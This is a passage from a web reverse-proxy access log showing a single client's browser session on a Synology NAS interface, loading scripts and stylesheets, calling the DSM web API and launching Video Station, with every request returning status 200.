10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:53:28 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 65] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:53:29 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 367] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:53:29 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 3176] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:53:29 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:53:30 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 4321] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:53:30 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:53:33 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:53:34 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:53:35 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 5747] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:53:35 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/MediaServer/dms.js?v=2.2.1-3406&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 15686] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:53:36 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 4321] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:53:39 +0000] - 200 200 - GET https nas.profibot.hu "/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 2713] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:53:39 +0000] - 200 200 - GET https nas.profibot.hu "/webman/unsupported-browsers/dist/bundle.css?v=42962-s9" [Client 84.1.26.27] [Length 590] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:39 +0000] - 200 200 - GET https nas.profibot.hu "/synoSDSjslib/sds.css?v=42962-s9" [Client 84.1.26.27] [Length 8242] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:39 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/scrollbar/flexcroll.css?v=42962-s9" [Client 84.1.26.27] [Length 360] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:39 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/noise/noise-c.js?v=42962-s9" [Client 84.1.26.27] [Length 5302] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:39 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/vue-router/vue-router.min.js?v=42962-s9" [Client 84.1.26.27] [Length 9737] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:39 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/babel-polyfill/polyfill.js?v=42962-s9" [Client 84.1.26.27] [Length 47694] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:39 +0000] - 200 200 - GET https nas.profibot.hu "/webman/entry/dist/dsm.entry.bundle.js?v=42962-s9" [Client 84.1.26.27] [Length 783] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:39 +0000] - 200 200 - GET https nas.profibot.hu "/webman/sds/dist/dsm.sds.bundle.js?v=42962-s9" [Client 84.1.26.27] [Length 14204] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:39 +0000] - 200 200 - GET https nas.profibot.hu "/synoSDSjslib/sds.js?v=42962-s9" [Client 84.1.26.27] [Length 92855] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:39 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.Defs&version=1&method=getjs&launchApp=SYNO.SDS.VideoStation.AppInstance&v=42962-s9" [Client 84.1.26.27] [Length 3648] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:39 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.JSUIString&version=1&method=getjs&lang=hun&v=42962-s9" [Client 84.1.26.27] [Length 4629] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:39 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3.4/resources/css/ext-all.css?v=42962-s9" [Client 84.1.26.27] [Length 12533] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:39 +0000] - 200 200 - GET https nas.profibot.hu "/webman/desktop/dist/style.css?v=42962-s9" [Client 84.1.26.27] [Length 4183] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:39 +0000] - 200 200 - GET https nas.profibot.hu "/webman/taskbar/dist/style.css?v=42962-s9" [Client 84.1.26.27] [Length 6059] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:39 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ux/ux-all.css?v=42962-s9" [Client 84.1.26.27] [Length 25110] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:39 +0000] - 200 200 - GET https nas.profibot.hu "/webman/login/dist/style.css?v=42962-s9" [Client 84.1.26.27] [Length 6016] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:39 +0000] - 200 200 - GET https nas.profibot.hu "/webman/resources/css/desktop.css?v=42962-s9" [Client 84.1.26.27] [Length 11272] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:39 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/synocredential.js/synocredential.min.js?v=42962-s9" [Client 84.1.26.27] [Length 5114] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:39 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/syno-vue-components/style/syno-vue-components.css?v=42962-s9" [Client 84.1.26.27] [Length 26445] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:39 +0000] - 200 200 - GET https nas.profibot.hu "/webman/unsupported-browsers/dist/bundle.js?v=42962-s9" [Client 84.1.26.27] [Length 889] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:39 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/synowebapi.js/synowebapi.min.js?v=42962-s9" [Client 84.1.26.27] [Length 12470] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:39 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/adapter/ext/ext-base.js?v=42962-s9" [Client 84.1.26.27] [Length 12041] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:39 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/noise/constants.js?v=42962-s9" [Client 84.1.26.27] [Length 898] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:39 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/noise/index.js?v=42962-s9" [Client 84.1.26.27] [Length 4478] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:39 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/scrollbar/flexcroll.js?v=42962-s9" [Client 84.1.26.27] [Length 8293] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:39 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/vuex/vuex.min.js?v=42962-s9" [Client 84.1.26.27] [Length 2978] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:39 +0000] - 200 200 - GET https nas.profibot.hu "/webman/login/dist/dsm.login.bundle.js?v=42962-s9" [Client 84.1.26.27] [Length 8796] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:40 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.SessionData&version=1&method=getjs&launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6&v=42962-s9" [Client 84.1.26.27] [Length 996] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:40 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ux/ux-all.js?v=42962-s9" [Client 84.1.26.27] [Length 84444] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:40 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/vue/vue.min.js?v=42962-s9" [Client 84.1.26.27] [Length 33045] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:40 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ext-all.js?v=42962-s9" [Client 84.1.26.27] [Length 219382] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:41 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/noise/sodium.js?v=42962-s9" [Client 84.1.26.27] [Length 248661] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:41 +0000] - 200 200 - GET https nas.profibot.hu "/webman/taskbar/dist/dsm.taskbar.bundle.js?v=42962-s9" [Client 84.1.26.27] [Length 32255] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:41 +0000] - 200 200 - GET https nas.profibot.hu "/synoSDSjslib/vendor.js?v=42962-s9" [Client 84.1.26.27] [Length 19196] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:41 +0000] - 200 200 - GET https nas.profibot.hu "/webman/sds/dist/dsm.common.bundle.js?v=42962-s9" [Client 84.1.26.27] [Length 19433] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:41 +0000] - 200 200 - GET https nas.profibot.hu "/webman/desktop/dist/dsm.desktop.bundle.js?v=42962-s9" [Client 84.1.26.27] [Length 22969] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:41 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:53:41 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:53:42 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/syno-vue-components/syno-vue-components.min.js?v=42962-s9" [Client 84.1.26.27] [Length 231162] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:42 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.UIString&version=1&method=getjs&lang=hun&v=42962-s9" [Client 84.1.26.27] [Length 585179] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:42 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 11031] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:53:42 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.API.Auth" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:43 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.API.Auth&version=6&method=token&_dc=1768485223056&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 98] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:43 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi/SYNO.Core.Desktop.PersonalUpdater" [Client 84.1.26.27] [Length 70] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:43 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi/SYNO.Core.Desktop.Initdata" [Client 84.1.26.27] [Length 5252] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:43 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/query.cgi" [Client 84.1.26.27] [Length 9496] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:43 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?_dc=1768485223424&SynoToken=MbvSA7Zte.JE6&launch_app=%22SYNO.SDS.VideoStation.AppInstance%22&api=SYNO.Core.Desktop.Initdata&method=get_user_service&version=1" [Client 84.1.26.27] [Length 5252] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:43 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:53:43 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 3339] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:43 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 4321] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:53:43 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 204] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:44 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 187] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:53:44 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?lang=%22hun%22&debug=null&launch_app=%22SYNO.SDS.VideoStation.AppInstance%22&api=SYNO.Core.Desktop.Initdata&method=get_ui_config&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] 